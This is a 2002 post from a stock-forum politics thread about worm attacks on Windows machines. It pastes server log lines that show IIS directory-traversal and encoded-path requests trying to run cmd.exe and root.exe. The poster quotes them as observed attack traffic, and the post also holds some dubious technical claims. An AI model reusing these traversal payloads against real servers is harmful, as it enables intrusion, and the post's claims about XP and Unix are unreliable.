PRESIDENT GEORGE W. BUSH Message Board

STOCKTALK

We've detected that you're using an ad content blocking browser plug-in or feature. Ads provide a critical source of revenue to the continued operation of Silicon Investor. We ask that you disable ad blocking while on Silicon Investor in the best interests of our community. If you are not using an ad blocker but are still receiving this message, make sure your browser's tracking protection is set to the 'standard' level.

Politics : PRESIDENT GEORGE W. BUSH

Public Reply Prvt Reply Mark as Last Read File

Previous 10 Next 10 Previous Next

To: David Lawrence who wrote (313629)	11/2/2002 11:29:33 AM
From: Thomas A Watson	Read Replies (2) of 769670

Easily, no that is not true in the case of these attacks. One can use any computer ones controls to launch attacks. These attacks are coming from computers infected with a virus and are attacking most likely without the knowledge of the owner. msft OS's have been found to be infected with relative ease from many different entrances. I would like for anyone to provide me with the names of some unix or linux viri. with xp there is a new wrinkle. xp has IP spoofing built in and thus is less detectable should it become the source of an attack and can switch ip's to get around ip lock outs. My advice to anyone with dsl or a cable modem. Even if you only have a single computer, connect to your cable/dsk modem thru a linksys of some other cable router. yesterday's attack I think this is some of the signature of the Code red virus. 234.200.252.64.snet.net - - [31/Oct/2002:18:44:50 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 ....... this morning's attack.... 64.119.99.222 - - [02/Nov/2002:03:39:55 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 64.119.99.222 - - [02/Nov/2002:03:39:55 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 64.119.99.222 - - [02/Nov/2002:03:39:56 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 64.119.99.222 - - [02/Nov/2002:03:39:56 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 64.119.99.222 - - [02/Nov/2002:03:39:56 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 64.119.99.222 - - [02/Nov/2002:03:39:56 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 64.119.99.222 - - [02/Nov/2002:03:39:57 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340 64.119.99.222 - - [02/Nov/2002:03:39:57 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 64.119.99.222 - - [02/Nov/2002:03:39:57 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 64.119.99.222 - - [02/Nov/2002:03:40:03 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 64.119.99.222 - - [02/Nov/2002:03:40:03 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306 64.119.99.222 - - [02/Nov/2002:03:40:03 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 64.119.99.222 - - [02/Nov/2002:03:40:03 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 290 64.119.99.222 - - [02/Nov/2002:03:40:04 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 64.119.99.222 - - [02/Nov/2002:03:40:04 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307

Report TOU Violation

Share This Post

Public Reply Prvt Reply Mark as Last Read File

Previous 10 Next 10 Previous Next